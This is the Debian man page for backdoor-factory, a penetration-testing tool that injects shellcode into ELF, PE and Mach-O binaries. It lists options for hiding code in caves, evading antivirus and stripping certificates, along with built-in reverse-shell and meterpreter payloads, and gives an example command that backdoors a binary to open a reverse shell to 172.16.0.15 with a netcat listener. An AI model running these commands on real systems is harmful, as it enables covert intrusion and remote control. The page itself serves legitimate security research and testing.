Provided by: backdoor-factory_3.4.2+dfsg-5_all
NAME
backdoor-factory - inject predefined or user-defined shellcode in binaries
SYNOPSIS
backdoor-factory [options]
DESCRIPTION
backdoor-factory patch executable binaries with user desired shellcode and continue normal execution of the prepatched state. This tool is for security professionals and researchers only. This tool doesn't support relocatable ELF executable (i.e. compiled with the -fPIE option, suggested by the Debian hardening requirements, see https://wiki.debian.org/Hardening) Binaries such as ssh may not be caved correctly, as binaries such as dolphin (at the time of this man page is written) are.
OPTIONS:
-h, --help show this help message and exit -f FILE, --file=FILE File to backdoor -s SHELL, --shell=SHELL Payloads that are available for use. Use 'show' to see payloads. -H HOST, --hostip=HOST IP of the C2 for reverse connections. -P PORT, --port=PORT The port to either connect back to for reverse shells or to listen on for bind shells -J, --cave_jumping Select this options if you want to use code cave jumping to further hide your shellcode in the binary. -a, --add_new_section Mandating that a new section be added to the exe (better success) but less av avoidance -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE User supplied shellcode, make sure that it matches the architecture that you are targeting. -c, --cave The cave flag will find code caves that can be used for stashing shellcode. This will print to all the code caves of a specific size.The -l flag can be use with this setting. -l SHELL_LEN, --shell_length=SHELL_LEN For use with -c to help find code caves of different sizes -o OUTPUT, --output-file=OUTPUT The backdoor output file path. Parent dir(s) must exist -n NSECTION, --section=NSECTION New section name must be less than seven characters -d DIR, --directory=DIR This is the location of the files that you want to backdoor. You can make a directory of file backdooring faster by forcing the attaching of a codecave to the exe by using the -a setting. -w, --change_access This flag changes the section that houses the codecave to RWE. Sometimes this is necessary. Enabled by default. If disabled, the backdoor may fail. -i, --injector This command turns the backdoor factory in a hunt and shellcode inject type of mechanism. Edit the target settings in the injector module. -u SUFFIX, --suffix=SUFFIX For use with injector, places a suffix on the original file for easy recovery -D, --delete_original For use with injector module. This command deletes the original file. Not for use in production systems. (Author not responsible for stupid uses.) -O DISK_OFFSET, --disk_offset=DISK_OFFSET Starting point on disk offset, in bytes. Some authors want to obfuscate their on disk offset to avoid reverse engineering, if you find one of those files use this flag, after you find the offset. -S, --support_check To determine if the file is supported by BDF prior to backdooring the file. For use by itself or with verbose. This check happens automatically if the backdooring is attempted. -M, --cave-miner Future use, to help determine smallest shellcode possible in a PE file -q, --no_banner Kills the banner. -v, --verbose For debug information output. -T IMAGE_TYPE, --image-type=IMAGE_TYPE ALL, x86, or x64 type binaries only. Default=ALL -Z, --zero_cert Allows for the overwriting of the pointer to the PE certificate table effectively removing the certificate from the binary for all intents and purposes. -R, --runas_admin EXPERIMENTAL Checks the PE binaries for 'requestedExecutionLevel level="highestAvailable"'. If this string is included in the binary, it must run as system/admin. If not in Support Check mode it will attmept to patch highestAvailable into the manifest if requestedExecutionLevel entry exists. -L, --patch_dll Use this setting if you DON'T want to patch DLLs. Patches by default. -F FAT_PRIORITY, --fat_priority=FAT_PRIORITY For MACH-O format. If fat file, focus on which arch to patch. Default is x64. To force x86 use -F x86, to force both archs use -F ALL. -B BEACON, --beacon=BEACON For payloads that have the ability to beacon out, set the time in secs -m PATCH_METHOD, --patch-method=PATCH_METHOD Patching methods for PE files, 'manual','automatic', replace and onionduke -b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY For onionduke. Provide your desired binary. -X, --xp_mode Default: DO NOT support for XP legacy machines, use -X to support XP. By default the binary will crash on XP machines (e.g. sandboxes) -A, --idt_in_cave EXPERIMENTAL By default a new Import Directory Table is created in a new section, by calling this flag it will be put in a code cave. This can cause bianry failure is some cases. Test on target binaries first. -C, --code_sign For those with codesigning certs wishing to sign PE binaries only. Name your signing key and private key signingcert.cer and signingPrivateKey.pem respectively in the certs directory it's up to you to obtain signing certs. -p, --preprocess To execute preprocessing scripts in the preprocess directory
ABOUT THE SHELLCODES
There is various predefined shellcode in backdoor-factory. Their availability depends on the target type (ELF32, ELF64, PE32...). The shellcodes list is defined below.
for all intel-based (x86 and x86_64 architecture)
reverse_shell_tcp need: a remote host and port to be set permits: remote shell access delay_reverse_shell_tcp need: a remote host and port to be set permits: remote shell access beaconing_reverse_shell_tcp need: a beacon, a remote host and port to be set permits: remote shell access user_supplied_shellcode need: a user-defined shellcode ready to inject permits: depend on the shellcode
Linux specific shellcodes
reverse_tcp_stager need: permits:
Windows PE32 exe shellcodes
reverse_shell_tcp_inline needs: a remote host and port to be set permits: remote shell access reverse_shell_tcp_stager_threaded needs: a remote host and port to be set permits: Inject the meterpreter server DLL via the Reflective Dll Injection payload meterpreter_reverse_https_threaded needs: a remote host and port to be set permits: meterpreter over https transport user_applied_shellcode_threaded needs: a user-defined shellcode ready to inject permits: depend on the shellcode iat_reverse_tcp_inline needs: a remote host and port to be set permits: iat_reverse_tcp_inline_threaded needs: a remote host and port to be set permits: iat_reverse_tcp_stager_threaded needs: a remote host and port to be set permits: Inject the meterpreter server DLL via the Reflective Dll Injection payload iat_user_applied_shellcode_threaded needs: a user-defined shellcode ready to inject permits: depend on the shellcode
Windows PE64 exe shellcodes
delay_reverse_shell_tcp needs: a remote host and port to be set permits: remote shell access reverse_shell_tcp needs: a remote host and port to be set permits: remote shell access beaconing_reverse_shell_tcp needs:a beacon, a remote host and port to be set permits: remote shell access user_supplied_shellcode needs: a user-defined shellcode ready to inject permits: depend on the shellcode
EXAMPLES
Example of cavecoding an ELF binary, by integrating a remote shell access through a remote TCP listener (e.g. netcat): backdoor-factory -f /usr/bin/dolphin -H 172.16.0.15 -P 8080 -s reverse_shell_tcp On the host behind the IP 172.16.0.15, start netcat in listen mode: $ netcat -l 172.16.0.15 8080 On the target, start the backdoored binary: ./backdoored/dolphin Now, on the host 172.16.0.15, just use your shell.
HISTORY
May 2017, Originally compiled by Philippe Thierry (phil at reseau-libre dot com)